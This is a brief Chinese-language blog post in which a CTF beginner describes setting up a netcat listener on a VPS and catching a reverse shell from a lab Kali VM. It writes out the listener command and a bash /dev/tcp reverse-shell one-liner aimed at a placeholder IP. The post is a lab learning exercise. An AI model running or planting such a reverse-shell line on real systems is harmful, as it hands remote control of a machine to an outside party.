Hpdoger's Blog.

Nc反弹Shell

Word count: 428 / Reading time: 2 min
2018/06/21 Share

写在前面

昨天打了sctf,太菜了还是从基础开始来吧,看到Bugku有一道命令执行的题目,因为没有回显要反弹到vps,由此接触到了反弹Shell这个东西

环境准备

有一台centOS7的vps主机当作控制、接受机器,一台kali linux的内网虚拟机当作靶机。一开始vps开了端口,靶机怎么也连接不上。后来请教line师傅,他说vps要看防火墙的放行端口,然后我Google了vutlr机器的放行端口是全部Ban掉的。。。尼玛,贴一个用firewalld开防火墙端口的文章

测试

1
目标主机为一个内网主机,并没有公网IP地址,我们无法从外网发起对目标主机的远程连接,此时我们使用的方法是使用获取的webshell主动发起一个反弹的shell到外网,然后获取一个目标主机的shell终端控制环境,而有关shell反弹的方法有很多这里简单介绍几种比较常见的方法。

bash 直接反弹

  1. 主机执行监听命令:

    1
    nc -l -p 8080 -vvv
  2. 靶机执行bash反弹命令:

    1
    root# bash -i >& /dev/tcp/XXXXXX(开放监听的ip)/8000 0>&1

kaiqi
xiaoguo

  1. 可以看到,我们在主机输入whoami,命令会传到靶机执行,然后返回信息到主机。相当于靶机的shell反弹到了主机。

最后

反弹shell有十种方法,这里有两篇文很不错,再贴上一篇nc命令的讲解:
linux各种一句话反弹shell总结

浅谈CTF中命令执行与绕过的小技巧

Linux每天一个命令:nc/ncat

CATALOG
  1. 1. 写在前面
  2. 2. 环境准备
  3. 3. 测试
    1. 3.1. bash 直接反弹
  4. 4. 最后